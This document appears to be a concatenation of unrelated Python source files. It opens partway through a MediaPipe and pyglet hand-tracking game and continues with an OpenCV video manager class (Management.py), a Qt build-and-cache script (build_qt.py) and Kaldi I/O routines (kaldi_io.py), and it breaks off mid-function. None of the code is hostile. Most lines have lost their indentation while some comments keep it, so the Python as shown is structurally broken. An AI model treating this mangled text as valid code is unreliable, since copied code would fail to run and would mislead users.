min_detection_confidence=0.5,
min_tracking_confidence=0.5) as hands:
while game_running:
success, image = cap.read()
            if not success:
                print("Ignoring empty camera frame.")
                # If loading a video, use 'break' instead of 'continue'.
                continue
            # To improve performance, optionally mark the image as not writeable
            # to pass it by reference.
image.flags.writeable = False
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
results = hands.process(image)
# Draw the hand annotations on the image.
image.flags.writeable = True
image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
if results.multi_hand_landmarks:
for i in range(len(results.multi_hand_landmarks)):
hand_landmarks = results.multi_hand_landmarks[i]
opposite_handedness = results.multi_handedness[i].classification[0].label # opposite due to flip
### Draw the skeleton detected
# mp_drawing.draw_landmarks(
# image,
# hand_landmarks,
# mp_hands.HAND_CONNECTIONS,
# mp_drawing_styles.get_default_hand_landmarks_style(),
# mp_drawing_styles.get_default_hand_connections_style())
if opposite_handedness == 'Left':
right_hand_pos = [camera_w-hand_landmarks.landmark[12].x*camera_w,
camera_h-hand_landmarks.landmark[12].y*camera_h,
hand_landmarks.landmark[12].z]
else:
left_hand_pos = [camera_w-hand_landmarks.landmark[12].x*camera_w,
camera_h-hand_landmarks.landmark[12].y*camera_h,
hand_landmarks.landmark[12].z]
image = cv2.flip(image, 1)
if cv2.waitKey(5) & 0xFF == 27:
print("exiting")
break
frame_data = image.copy()
cap.release()
def update_camera(dt):
global pyimg
raw_frame = frame_data
frame = cv2.resize(raw_frame, None, fx=2, fy=2)
pyimg = cv2glet(frame)
@window.event()
def on_draw():
window.clear()
pyimg.blit(0,0)
outer_batch.draw()
circle_batch.draw()
num_batch.draw()
cursor_batch2.draw()
cursor_batch1.draw()
score_background.draw()
score_label.draw()
hit_label.draw()
@window.event()
def on_close():
global game_running
game_running = False
print("\n-- Game stopping --\n")
t.join()
pyglet.app.event_loop.exit()
return pyglet.event.EVENT_HANDLED
t = threading.Thread(target = thread_mediapipe, name='mediapipe')
t.start()
bgm.play()
start_time = time.time()*1000
pyglet.clock.schedule_interval(update_camera, 1/60)
pyglet.clock.schedule_interval(update_circle, 1/100)
pyglet.app.run()
|
Management.py
|
# MIT License
# Copyright (c) 2019 Fernando Perez
import numpy as np
import time
import cv2
try:
from PIL import Image
except ModuleNotFoundError as e:
pass
try:
    # It is useful if you want to detect scene changes
import imagehash
except ModuleNotFoundError as e:
pass
try:
    # It is useful if you want to track objects
import dlib
except ModuleNotFoundError as e:
pass
from queue import Queue
from threading import Thread
class ManagerCV2():
""" ManagerCV2 helps to manage videos and streams
With this Class you are capable to iterate a video frame by frame (if you want,
you can also limit the FPS).
Also you can add keystrokes with your own callbacks methods in a easiest way.
At the same time you can ask to this manager the index of the current frame
(self.count_frames) and the FPS processing average.
Finally you can set a method to execute when finishing the iteration.
"""
_tries_reconnect_stream = 10
class KeystrokeManager():
""" KeystrokeManager helps to manage all keystroke during the for of the manager
With this Class ManagerCV2 is capable to manage easily each keystroke.
"""
def __init__(self, **kwargs):
""" KeystrokeManager constructor.
            Keep in mind that with this class you will never get an error when
            you ask for an attribute that doesn't exist.
            It will be created with the value False.
            That's convenient because you can pass no params to this constructor and
            then, when you need to check if a keystroke was pressed (you really
            check the param, not the keystroke itself), if it was never pressed
            the param doesn't exist, but we take care of it for you :)
Keyword arguments:
Each keyword argument that you pass to the constructor will be
an attribute for this object.
"""
self.__dict__.update(kwargs)
def __getattr__ (self, attr):
""" getattr
            Keep in mind that this method is called each time you try to get
            an attribute that doesn't exist.
            We manage it by creating this attribute and giving it the value False.
            This is because we want to indicate that the keystroke associated with
            this parameter hasn't been pressed yet.
"""
self.__dict__[attr] = False
return False
def execute_management(self, *args):
""" execute_management
            Each time a relevant key is pressed, it toggles the associated
            params, so you can check them and decide what to do in each
            case.
"""
for arg in args:
value = getattr(self, arg)
setattr(self, arg, not value)
def __init__(self, video, is_stream=False, fps_limit=0, queue_size=256, detect_scenes=False, show_video=False):
""" ManagerCV2 constructor.
Arguments:
video -- cv2.VideoCapture that it is going to manage
Keyword arguments:
            is_stream -- Bool to indicate whether it is a stream or not.
                It is not strictly necessary to set it to True when using a stream;
                it only controls how stream issues are handled.
                On a stream it is possible to lose frames, so, if you set is_stream
                to True, it will try to reconnect the stream as many times as
                `ManagerCV2._tries_reconnect_stream` indicates. (Default: False)
            fps_limit -- Maximum FPS of the video. If you set it to 0,
                it means no limit. (Default: 0)
            queue_size -- The maximum number of frames to store in the queue (for multiprocessing). (Default: 256)
            detect_scenes -- Bool to indicate if you want to detect scene changes;
                it has a small impact on the frame rate (almost none
                if it is a video and you set fps_limit < 60). (Default: False)
            show_video -- Bool to indicate if you want to show the video (with cv2.imshow).
                If you use the method `add_keystroke` you don't need to use this param
                (it's fine if you still want to set it to True).
                Also, if you don't want to show the video, leave it as False. (Default: False)
"""
        # Video/Stream management attributes
self.video = video
self.is_stream = is_stream
self.stream = video
self.fps_limit = fps_limit
self.show_video = show_video
self.queue_size = queue_size
self.stream_error = False
self.stopped = False
self.queue = None
self.queue_thread = None
self.awake_thread = None
# Keystrokes attributes
self.key_manager = ManagerCV2.KeystrokeManager()
self.last_keystroke = -1
self.__keystroke_dict = {
            # The first three elements will always have the same length
'keystroke':[],
'wait_key':[],
'keystroke_args':[],
'exit_keystrokes':[],
}
self.ret_handler = None
self.ret_handler_args = ()
self.ret_handler_kwargs = {}
# Additional features
self.initial_time = None
self.final_time = None
self.count_frames = 0
# Scene detection
self.detect_scenes = detect_scenes
self.new_scene = False
self.previous_frame_hash = None
self.hash_distance = 25
# Tracking algorithm
self.selector_tracker = None
self.trackers = []
def __iter__(self):
self.initial_time = time.time()
self.last_frame_time = self.initial_time
self.final_time = self.initial_time
self.count_frames = 0
self.last_keystroke = -1
# All queue management
self.stopped = False
self.queue = Queue(maxsize=self.queue_size)
self.queue_awake = Queue(maxsize=1)
self.queue_thread = Thread(target=self.fill_queue, args=())
self.queue_thread.daemon = True
self.queue_thread.start()
return self
def __next__(self):
# Get frame from queue if not stopped yet
if self.stopped and self.queue.qsize() == 0:
self.end_iteration()
frame, frame_hash = self.queue.get(block=True)
        # This is how it communicates with the thread (to indicate it took something)
if not self.queue_awake.full():
self.queue_awake.put(None)
# If we get a frame but it is None, it means that we finished the queue
if frame is None:
self.end_iteration()
# If we must detect scenes it will help us
if self.detect_scenes:
if not self.previous_frame_hash:
self.new_scene = True
else:
self.new_scene = (frame_hash - self.previous_frame_hash > self.hash_distance)
self.previous_frame_hash = frame_hash
self.final_time = time.time()
self.count_frames += 1
# If they press one of the keystrokes, it will raise the method
for i, wait_key in enumerate(self.__keystroke_dict['wait_key']):
self.last_keystroke = cv2.waitKey(wait_key)
if self.last_keystroke in self.__keystroke_dict['keystroke']:
index = self.__keystroke_dict['keystroke'].index(self.last_keystroke)
self.key_manager.execute_management(*self.__keystroke_dict['keystroke_args'][index])
if self.last_keystroke in self.__keystroke_dict['exit_keystrokes']:
self.end_iteration()
        # If we don't add a keystroke we should at least wait a minimum amount of time
        # in order to be able to display the video with cv2.imshow (if you indicated
        # that you want to display the video).
        # Also, you can wait by yourself (without using Management)
if self.show_video and not self.__keystroke_dict['wait_key']:
cv2.waitKey(1)
# Here we limit the speed (if we want constant frames)
if self.fps_limit:
time_to_sleep = (1 / self.fps_limit) - (time.time() - self.last_frame_time)
if time_to_sleep > 0:
time.sleep(time_to_sleep)
self.last_frame_time = time.time()
return frame
def fill_queue(self):
# keep looping infinitely
while True:
# If the thread indicator variable is set, stop the thread
if self.stopped:
return
if not self.queue.full():
ret, frame = self.video.read()
                # In the case of streaming this means that we could lose some frames,
                # so this variable is useful for checking that
                self.stream_error = not ret
# If it is a streaming we will try to reconnect
if self.is_stream and not ret:
exit = False
for i in range(ManagerCV2._tries_reconnect_stream):
ret, frame = self.video.read()
if ret:
break
if i+1 == ManagerCV2._tries_reconnect_stream:
self.stop_queue()
return
elif not ret:
self.stop_queue()
return
frame_hash = None
if self.detect_scenes:
frame_hash = imagehash.dhash(Image.fromarray(frame))
self.queue.put((frame,frame_hash))
queue_size = self.queue.qsize()
else:
# I want to wait until someone awake me
self.queue_awake.get()
def stop_queue(self):
self.stopped = True
self.queue.put((None,None))
def set_tracking(self, selector, frame):
self.selector_tracker = selector
self.trackers = []
rgb_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
height, width, _ = rgb_frame.shape
for selection in self.selector_tracker.zones:
if self.selector_tracker.normalized:
selection = (int(selection[0]*width),
int(selection[1]*height),
int(selection[2]*width),
int(selection[3]*height))
tracker = dlib.correlation_tracker()
tracker.start_track(rgb_frame, dlib.rectangle(*selection))
self.trackers.append(tracker)
def get_tracking(self, frame):
rgb_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
height, width, _ = rgb_frame.shape
for i, tracker in enumerate(self.trackers):
tracker.update(rgb_frame)
pos = tracker.get_position()
selection = (int(pos.left()),int(pos.top()), int(pos.right()), int(pos.bottom()))
if self.selector_tracker.normalized:
selection = (selection[0]/width,
selection[1]/height,
selection[2]/width,
selection[3]/height)
self.selector_tracker.zones[i] = selection
return self.selector_tracker
def set_ret_handler(self, method, *args, **kwargs):
""" Method to execute when finished Video/Stream
Arguments:
method -- Method to execute
args -- Arguments to pass to the method
            kwargs -- Keyword arguments to pass to the method
"""
self.ret_handler = method
self.ret_handler_args = args
self.ret_handler_kwargs = kwargs
def add_keystroke(self, keystroke, wait_key, *args, exit=False):
""" Method to execute when pressed a key
Arguments:
keystroke -- Key to check if pressed
            wait_key -- ms to wait for a key (it works exactly like cv2.waitKey)
args -- Arguments to pass to the method
"""
self.__keystroke_dict['keystroke'].append(keystroke)
self.__keystroke_dict['wait_key'].append(wait_key)
self.__keystroke_dict['keystroke_args'].append(args)
if exit:
self.__keystroke_dict['exit_keystrokes'].append(keystroke)
def get_last_keystroke(self):
""" Check the last pressed keystroke (not neccesarily in the last frame)"""
return self.last_keystroke
def end_iteration(self):
""" Internal method to finish iteration, with the previous configuration"""
self.stopped = True
self.video.release()
if self.ret_handler:
self.ret_handler(*self.ret_handler_args, **self.ret_handler_kwargs)
raise StopIteration
def get_fps(self):
""" Get average FPS"""
return round(self.count_frames / (self.final_time - self.initial_time),3)
def is_error_last_frame(self):
""" If we lose the last frame it will return True eoc False (only usefull for streams)"""
return self.stream_error
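# --- Usage sketch (illustrative, not part of the original module) ---
# A minimal example of driving ManagerCV2: iterate a local video at 30 FPS and
# stop with the Esc key. The file name 'video.mp4' is a hypothetical placeholder.
if __name__ == '__main__':
    manager = ManagerCV2(cv2.VideoCapture('video.mp4'),
                         fps_limit=30, show_video=True)
    # Key code 27 (Esc) toggles the 'esc_pressed' flag and ends the iteration
    manager.add_keystroke(27, 1, 'esc_pressed', exit=True)
    for frame in manager:
        cv2.imshow('ManagerCV2 example', frame)
    print('Average FPS:', manager.get_fps())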
|
build_qt.py
|
import subprocess as sp
import multiprocessing as mp
import os
import time
import tarfile
import argparse
import threading
import platform
import shutil
import hashlib
import blobfile as bf
from .common import run, GCS_BUCKET
BUILD_VERSION = 11
def cache_folder(name, dirpath, options, build_fn):
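    # Descriptive comment (added): build `dirpath` via build_fn() unless it already
    # exists locally or a cached tarball (keyed by `name` and an MD5 of `options`)
    # can be fetched from GCS; after a fresh build, upload the tarball for reuse.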
if os.path.exists(dirpath):
print(f"cache for {name} found locally")
return
options_hash = hashlib.md5("|".join(options).encode("utf8")).hexdigest()
cache_path = bf.join(f"gs://{GCS_BUCKET}", "cache", f"{name}-{options_hash}.tar")
if "GOOGLE_APPLICATION_CREDENTIALS" not in os.environ:
# we don't have any credentials to do the caching, always build in this case
print(f"building without cache for {name}")
start = time.time()
build_fn()
print(f"build elapsed {time.time() - start}")
elif bf.exists(cache_path):
print(f"downloading cache for {name}: {cache_path}")
start = time.time()
with bf.BlobFile(cache_path, "rb") as f:
with tarfile.open(fileobj=f, mode="r") as tf:
tf.extractall()
print(f"download elapsed {time.time() - start}")
else:
print(f"building cache for {name}")
start = time.time()
build_fn()
print(f"cache build elapsed {time.time() - start}")
print(f"uploading cache for {name}")
start = time.time()
if not bf.exists(cache_path):
with bf.BlobFile(cache_path, "wb") as f:
with tarfile.open(fileobj=f, mode="w") as tf:
tf.add(dirpath)
print(f"upload elapsed {time.time() - start}")
# workaround for timeout error
# https://docs.travis-ci.com/user/common-build-problems/#build-times-out-because-no-output-was-received
# since we may be running inside a docker image without the travis_wait command, do this manually
def no_timeout_worker():
while True:
time.sleep(60)
print(".")
def build_qt(output_dir):
no_timeout_thread = threading.Thread(target=no_timeout_worker, daemon=True)
no_timeout_thread.start()
qt_version = "5.13.2"
os.makedirs(output_dir, exist_ok=True)
os.chdir(output_dir)
os.makedirs("qt", exist_ok=True)
os.chdir("qt")
modules = ["qtbase"]
def download_source():
run("git clone https://code.qt.io/qt/qt5.git")
os.chdir("qt5")
run(f"git checkout v{qt_version}")
run("perl init-repository --module-subset=" + ",".join(modules))
os.chdir("..")
# downloading the source from git takes 25 minutes on travis
# so cache the source so we don't have to use git
cache_folder("qt-source", dirpath="qt5", options=[qt_version, platform.system()] + modules, build_fn=download_source)
qt_options = [
"-confirm-license",
"-static",
"-release",
# -qtnamespace should in theory reduce the likelihood of symbol conflicts
"-qtnamespace",
"ProcGenQt",
"-opensource",
"-nomake",
"examples",
"-nomake",
"tests",
"-nomake",
"tools",
# travis mac os x server does not seem to support avx2
"-no-avx2",
"-no-avx512",
# extra stuff we don't need
"-no-pch",
"-no-harfbuzz",
"-no-openssl",
"-no-dbus",
"-no-opengl",
"-no-xcb",
"-no-libjpeg",
"-no-ico",
"-no-gif",
# useful for profiling
# "-force-debug-info",
]
if platform.system() == "Windows":
# parallelize the windows build
qt_options.append("-mp")
def compile_qt():
os.makedirs("build")
os.chdir("build")
if platform.system() == "Windows":
qt_configure = "..\\qt5\\configure"
else:
qt_configure = "../qt5/configure"
run(f"{qt_configure} -prefix {os.getcwd()}/qtbase " + " ".join(qt_options))
if platform.system() == "Windows":
run("nmake", stdout=sp.PIPE, stderr=sp.STDOUT)
else:
run(f"make -j{mp.cpu_count()}", stdout=sp.PIPE, stderr=sp.STDOUT)
os.chdir("..")
run("du -hsc build")
for root, dirs, files in os.walk("."):
for dirname in dirs:
if dirname in (".obj", ".pch"):
dirpath = os.path.join(root, dirname)
print(f"remove dir {dirpath}")
shutil.rmtree(dirpath)
run("du -hsc build")
cache_folder("qt-build", dirpath="build", options=[platform.system(), os.environ.get("TRAVIS_OSX_IMAGE", "")] + qt_options, build_fn=compile_qt)
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--output-dir", required=True)
args = parser.parse_args()
build_qt(args.output_dir)
if __name__ == "__main__":
main()
|
kaldi_io.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2014-2016 Brno University of Technology (author: Karel Vesely)
# Licensed under the Apache License, Version 2.0 (the "License")
import numpy as np
import sys, os, re, gzip, struct
#################################################
# Adding kaldi tools to shell path,
# Select kaldi,
if not 'KALDI_ROOT' in os.environ:
# Default! To change run python with 'export KALDI_ROOT=/some_dir python'
os.environ['KALDI_ROOT']='/mnt/matylda5/iveselyk/Tools/kaldi-trunk'
# Add kaldi tools to path,
os.environ['PATH'] = os.popen('echo $KALDI_ROOT/src/bin:$KALDI_ROOT/tools/openfst/bin:$KALDI_ROOT/src/fstbin/:$KALDI_ROOT/src/gmmbin/:$KALDI_ROOT/src/featbin/:$KALDI_ROOT/src/lm/:$KALDI_ROOT/src/sgmmbin/:$KALDI_ROOT/src/sgmm2bin/:$KALDI_ROOT/src/fgmmbin/:$KALDI_ROOT/src/latbin/:$KALDI_ROOT/src/nnetbin:$KALDI_ROOT/src/nnet2bin:$KALDI_ROOT/src/nnet3bin:$KALDI_ROOT/src/online2bin/:$KALDI_ROOT/src/ivectorbin/:$KALDI_ROOT/src/lmbin/').readline().strip() + ':' + os.environ['PATH']
#################################################
# Define all custom exceptions,
class UnsupportedDataType(Exception): pass
class UnknownVectorHeader(Exception): pass
class UnknownMatrixHeader(Exception): pass
class BadSampleSize(Exception): pass
class BadInputFormat(Exception): pass
class SubprocessFailed(Exception): pass
#################################################
# Data-type independent helper functions,
def open_or_fd(file, mode='rb'):
""" fd = open_or_fd(file)
Open file, gzipped file, pipe, or forward the file-descriptor.
   Seeks to the given offset, if the 'file' argument contains a ':offset' suffix.
"""
offset = None
try:
# strip 'ark:' prefix from r{x,w}filename (optional),
if re.search('^(ark|scp)(,scp|,b|,t|,n?f|,n?p|,b?o|,n?s|,n?cs)*:', file):
(prefix,file) = file.split(':',1)
# separate offset from filename (optional),
if re.search(':[0-9]+$', file):
(file,offset) = file.rsplit(':',1)
# input pipe?
if file[-1] == '|':
fd = popen(file[:-1], 'rb') # custom,
# output pipe?
elif file[0] == '|':
fd = popen(file[1:], 'wb') # custom,
# is it gzipped?
elif file.split('.')[-1] == 'gz':
fd = gzip.open(file, mode)
# a normal file...
else:
fd = open(file, mode)
except TypeError:
# 'file' is opened file descriptor,
fd = file
  # Seek to the offset, if given,
if offset != None: fd.seek(int(offset))
return fd
# based on '/usr/local/lib/python3.4/os.py'
def popen(cmd, mode="rb"):
if not isinstance(cmd, str):
raise TypeError("invalid cmd type (%s, expected string)" % type(cmd))
import subprocess, io, threading
# cleanup function for subprocesses,
def cleanup(proc, cmd):
ret = proc.wait()
if ret > 0:
raise SubprocessFailed('cmd %s returned %d !' % (cmd,ret))
return
# text-mode,
if mode == "r":
proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
threading.Thread(target=cleanup,args=(proc,cmd)).start() # clean-up thread,
return io.TextIOWrapper(proc.stdout)
elif mode == "w":
proc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE)
threading.Thread(target=cleanup,args=(proc,cmd)).start() # clean-up thread,
return io.TextIOWrapper(proc.stdin)
# binary,
elif mode == "rb":
proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
threading.Thread(target=cleanup,args=(proc,cmd)).start() # clean-up thread,
return proc.stdout
elif mode == "wb":
proc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE)
threading.Thread(target=cleanup,args=(proc,cmd)).start() # clean-up thread,
return proc.stdin
# sanity,
else:
raise ValueError("invalid mode %s" % mode)
def read_key(fd):
""" [key] = read_key(fd)
Read the utterance-key from the opened ark/stream descriptor 'fd'.
"""
key = ''
while 1:
char = fd.read(1).decode("latin1")
if char == '' : break
if char == ' ' : break
key += char
key = key.strip()
if key == '': return None # end of file,
  assert(re.match(r'^\S+$', key) != None) # check format (no whitespace!)
return key
#################################################
# Integer vectors (alignments, ...),
def read_ali_ark(file_or_fd):
""" Alias to 'read_vec_int_ark()' """
return read_vec_int_ark(file_or_fd)
def read_vec_int_ark(file_or_fd):
""" generator(key,vec) = read_vec_int_ark(file_or_fd)
Create generator of (key,vector<int>) tuples, which reads from the ark file/stream.
file_or_fd : ark, gzipped ark, pipe or opened file descriptor.
Read ark to a 'dictionary':
d = { u:d for u,d in kaldi_io.read_vec_int_ark(file) }
"""
fd = open_or_fd(file_or_fd)
try:
key = read_key(fd)
while key:
ali = read_vec_int(fd)
yield key, ali
key = read_key(fd)
finally:
if fd is not file_or_fd: fd.close()
def read_vec_int(file_or_fd):
""" [int-vec] = read_vec_int(file_or_fd)
Read kaldi integer vector, ascii or binary input,
"""
fd = open_or_fd(file_or_fd)
binary = fd.read(2).decode()
if binary == '\0B': # binary flag
assert(fd.read(1).decode() == '\4'); # int-size
vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # vector dim
    # Elements of the int32 vector are stored in tuples: (sizeof(int32), value),
vec = np.frombuffer(fd.read(vec_size*5), dtype=[('size','int8'),('value','int32')], count=vec_size)
assert(vec[0]['size'] == 4) # int32 size,
ans = vec[:]['value'] # values are in 2nd column,
else: # ascii,
arr = (binary + fd.readline().decode()).strip().split()
try:
arr.remove('['); arr.remove(']') # optionally
except ValueError:
pass
ans = np.array(arr, dtype=int)
if fd is not file_or_fd : fd.close() # cleanup
return ans
# Writing,
def write_vec_int(file_or_fd, v, key=''):
""" write_vec_int(f, v, key='')
Write a binary kaldi integer vector to filename or stream.
Arguments:
file_or_fd : filename or opened file descriptor for writing,
v : the vector to be stored,
key (optional) : used for writing ark-file, the utterance-id gets written before the vector.
Example of writing single vector:
kaldi_io.write_vec_int(filename, vec)
Example of writing arkfile:
with open(ark_file,'w') as f:
for key,vec in dict.iteritems():
       kaldi_io.write_vec_int(f, vec, key=key)
"""
fd = open_or_fd(file_or_fd, mode='wb')
if sys.version_info[0] == 3: assert(fd.mode == 'wb')
try:
if key != '' : fd.write((key+' ').encode("latin1")) # ark-files have keys (utterance-id),
fd.write('\0B'.encode()) # we write binary!
# dim,
fd.write('\4'.encode()) # int32 type,
fd.write(struct.pack(np.dtype('int32').char, v.shape[0]))
# data,
for i in range(len(v)):
fd.write('\4'.encode()) # int32 type,
fd.write(struct.pack(np.dtype('int32').char, v[i])) # binary,
finally:
if fd is not file_or_fd : fd.close()
#################################################
# Float vectors (confidences, ivectors, ...),
# Reading,
def read_vec_flt_scp(file_or_fd):
""" generator(key,mat) = read_vec_flt_scp(file_or_fd)
Returns generator of (key,vector) tuples, read according to kaldi scp.
file_or_fd : scp, gzipped scp, pipe or opened file descriptor.
Iterate the scp:
for key,vec in kaldi_io.read_vec_flt_scp(file):
...
Read scp to a 'dictionary':
d = { key:mat for key,mat in kaldi_io.read_mat_scp(file) }
"""
fd = open_or_fd(file_or_fd)
try:
for line in fd:
(key,rxfile) = line.decode().split(' ')
vec = read_vec_flt(rxfile)
yield key, vec
finally:
if fd is not file_or_fd : fd.close()
def read_vec_flt_ark(file_or_fd):
""" generator(key,vec) = read_vec_flt_ark(file_or_fd)
Create generator of (key,vector<float>) tuples, reading from an ark file/stream.
file_or_fd : ark, gzipped ark, pipe or opened file descriptor.
Read ark to a 'dictionary':
d = { u:d for u,d in kaldi_io.read_vec_flt_ark(file) }
"""
fd = open_or_fd(file_or_fd)
try:
key = read_key(fd)
while key:
ali = read_vec_flt(fd)
yield key, ali
key = read_key(fd)
finally:
if fd is not file_or_fd: fd.close()
def read_vec_flt(file_or_fd):
""" [flt-vec] = read_vec_flt(file_or_fd)
Read kaldi float vector, ascii or binary input,
"""
fd = open_or_fd(file_or_fd)
binary = fd.read(2).decode()
if binary == '\0B': # binary flag
# Data type,
header = fd.read(3).decode()
if header == 'FV ': sample_size = 4 # floats
elif header == 'DV ': sample_size = 8 # doubles
else: raise UnknownVectorHeader("The header contained '%s'" % header)
assert(sample_size > 0)
# Dimension,
assert(fd.read(1).decode() == '\4'); # int-size
vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # vector dim
# Read whole vector,
buf = fd.read(vec_size * sample_size)
if sample_size == 4 : ans = np.frombuffer(buf, dtype='float32')
elif sample_size == 8 : ans = np.frombuffer(buf, dtype='float64')
else : raise BadSampleSize
return ans
else: # ascii,
arr = (binary + fd.readline().decode()).strip().split()
try:
arr.remove('['); arr.remove(']') # optionally
except ValueError:
pass
ans = np.array(arr, dtype=float)
if fd is not file_or_fd : fd.close() # cleanup
return ans
# Writing,
def write_vec_flt(file_or_fd, v, key=''):
""" write_vec_flt(f, v, key='')
Write a binary kaldi vector to filename or stream. Supports 32bit and 64bit floats.
Arguments:
file_or_fd : filename or opened file descriptor for writing,
v : the vector to be stored,
key (optional) : used for writing ark-file, the utterance-id gets written before the vector.
Example of writing single vector:
kaldi_io.write_vec_flt(filename, vec)
Example of writing arkfile:
with open(ark_file,'w') as f:
for key,vec in dict.iteritems():
kaldi_io.write_vec_flt(f, vec, key=key)
"""
fd = open_or_fd(file_or_fd, mode='wb')
if sys.version_info[0] == 3: assert(fd.mode == 'wb')
try:
if key != '' : fd.write((key+' ').encode("latin1")) # ark-files have keys (utterance-id),
fd.write('\0B'.encode()) # we write binary!
# Data-type,
if v.dtype == 'float32': fd.write('FV '.encode())
elif v.dtype == 'float64': fd.write('DV '.encode())
else: raise UnsupportedDataType("'%s', please use 'float32' or 'float64'" % v.dtype)
# Dim,
fd.write('\04'.encode())
fd.write(struct.pack(np.dtype('uint32').char, v.shape[0])) # dim
# Data,
fd.write(v.tobytes())
finally:
if fd is not file_or_fd : fd.close()
#################################################
# Float matrices (features, transformations, ...),
# Reading,
def read_mat_scp(file_or_fd):
""" generator(key,mat) = read_mat_scp(file_or_fd)
Returns generator of (key,matrix) tuples, read according to kaldi scp.
file_or_fd : scp, gzipped scp, pipe or opened file descriptor.
Iterate the scp:
for key,mat in kaldi_io.read_mat_scp(file):
...
Read scp to a 'dictionary':
d = { key:mat for key,mat in kaldi_io.read_mat_scp(file) }
"""
fd = open_or_fd(file_or_fd)
try:
for line in fd:
(key,rxfile) = line.decode().split(' ')
mat = read_mat(rxfile)
yield key, mat
finally:
if fd is not file_or_fd : fd.close()
def read_mat_ark(file_or_fd):
""" generator(key,mat) = read_mat_ark(file_or_fd)
Returns generator of (key,matrix) tuples, read from ark file/stream.
file_or_fd : scp, gzipped scp, pipe or opened file descriptor.
Iterate the ark:
for key,mat in kaldi_io.read_mat_ark(file):
...
Read ark to a 'dictionary':
d = { key:mat for key,mat in kaldi_io.read_mat_ark(file) }
"""
fd = open_or_fd(file_or_fd)
try:
key = read_key(fd)
while key:
mat = read_mat(fd)
yield key, mat
key = read_key(fd)
finally:
if fd is not file_or_fd : fd.close()
def read_mat(file_or_fd):
""" [mat] = read_mat(file_or_fd)
Reads single kaldi matrix, supports ascii and binary.
file_or_fd : file, gzipped file, pipe or opened file descriptor.
"""
fd = open_or_fd(file_or_fd)
try:
binary = fd.read(2).decode()
if binary == '\0B' :
mat = _read_mat_binary(fd)
else:
assert(binary == ' [')
mat = _read_mat_ascii(fd)
finally:
if fd is not file_or_fd: fd.close()
return mat
def _read_mat_binary(fd):
# Data type
header = fd.read(3).decode()
# 'CM', 'CM2', 'CM3' are possible values,
if header.startswith('CM'): return _read_compressed_mat(fd, header)
elif header == 'FM ': sample_size = 4 # floats
elif header == 'DM ': sample_size = 8 # doubles
else: raise UnknownMatrixHeader("The header contained '%s'" % header)
assert(sample_size > 0)
# Dimensions
s1, rows, s2, cols = np.frombuffer(fd.read(10), dtype='int8,int32,int8,int32', count=1)[0]
# Read whole matrix
buf = fd.read(rows * cols * sample_size)
if sample_size == 4 : vec = np.frombuffer(buf, dtype='float32')
elif sample_size == 8 : vec = np.frombuffer(buf, dtype='float64')
else : raise BadSampleSize
mat = np.reshape(vec,(rows,cols))
return mat
def _read_mat_ascii(fd):
rows = []
while 1:
line = fd.readline().decode()
if (len(line) == 0) : raise BadInputFormat # eof, should not happen!
if len(line.strip()) == 0 : continue # skip empty line
arr = line.strip().split()
if arr[-1] != ']':
rows.append(np.array(arr,dtype='float32')) # not last line
else:
rows.append(np.array(arr[:-1],dtype='float32')) # last line
mat = np.vstack(rows)
return mat
def _read_compressed_mat(fd, format):
""" Read a compressed matrix,
see: https://github.com/kaldi-asr/kaldi/blob/master/src/matrix/compressed-matrix.h
methods: CompressedMatrix::Read(...), CompressedMatrix::CopyToMat(...),
"""
assert(format == 'CM ') # The formats CM2, CM3 are not supported...
# Format of header 'struct',
global_header = np.dtype([('minvalue','float32'),('range','float32'),('num_rows','int32'),('num_cols','int32')]) # member '.format' is not written,
per_col_header = np.dtype([('percentile_0','uint16'),('percentile_25','uint16'),('percentile_75','uint16'),('percentile_100','uint16')])
# Mapping for percentiles in col-headers,
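  # (1.52590218966964e-05 == 1/65535, so each uint16 percentile maps linearly onto [min, min+range])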
def uint16_to_float(value, min, range):
return np.float32(min + range * 1.52590218966964e-05 * value)
# Mapping for matrix elements,
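  # (byte values 0..64 map onto [p0,p25], 65..192 onto [p25,p75], 193..255 onto [p75,p100])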
def uint8_to_float_v2(vec, p0, p25, p75, p100):
# Split the vector by masks,
mask_0_64 = (vec <= 64);
mask_193_255 = (vec > 192);
mask_65_192 = (~(mask_0_64 | mask_193_255));
# Sanity check (useful but slow...),
# assert(len(vec) == np.sum(np.hstack([mask_0_64,mask_65_192,mask_193_255])))
# assert(len(vec) == np.sum(np.any([mask_0_64,mask_65_192,mask_193_255], axis=0)))
# Build the float vector,
ans = np.empty(len(vec), dtype='float32')
ans[mask_0_64] = p0 + (p25 - p0) / 64. * vec[mask_0_64]
ans[mask_65_192] = p25 + (p75 - p25) / 128. * (vec[mask_65_192] - 64)
ans[mask_193_255] = p75 + (p100 - p75) / 63. * (vec[mask_193_255] - 192)
return ans
# Read global header,
globmin, globrange, rows, cols = np.frombuffer(fd.read(16), dtype=global_header, count=1)[0]
  # The data is structured as [Colheader, ... , Colheader, Data, Data , .... ]
# { cols }{ size }
col_headers = np.frombuffer(fd.read(cols*8), dtype=per_col_header, count=cols)
data = np.reshape(np.frombuffer(fd.read(cols*rows), dtype='uint8', count=cols*rows), newshape=(cols,rows)) # stored as col-major,
mat = np.empty((cols,rows), dtype='float32')
for i, col_header in enumerate(col_headers):
col_header_flt = [ uint16_to_float(percentile, globmin, globrange) for percentile in col_header ]
mat[i] = uint8_to_float_v2(data[i], *col_header_flt)
return mat.T # transpose! col-major -> row-major,
# Writing,
def write_mat(file_or_fd, m, key=''):
""" write_mat(f, m, key='')
Write a binary kaldi matrix to filename or stream. Supports 32bit and 64bit floats.
Arguments:
   file_or_fd : filename or opened file descriptor for writing,
m : the matrix to be stored,
key (optional) : used for writing ark-file, the utterance-id gets written before the matrix.
Example of writing single matrix:
kaldi_io.write_mat(filename, mat)
Example of writing arkfile:
with open(ark_file,'w') as f:
for key,mat in dict.iteritems():
kaldi_io.write_mat(f, mat, key=key)
"""
fd = open_or_fd(file_or_fd, mode='wb')
if sys.version_info[0] == 3: assert(fd.mode == 'wb')
try:
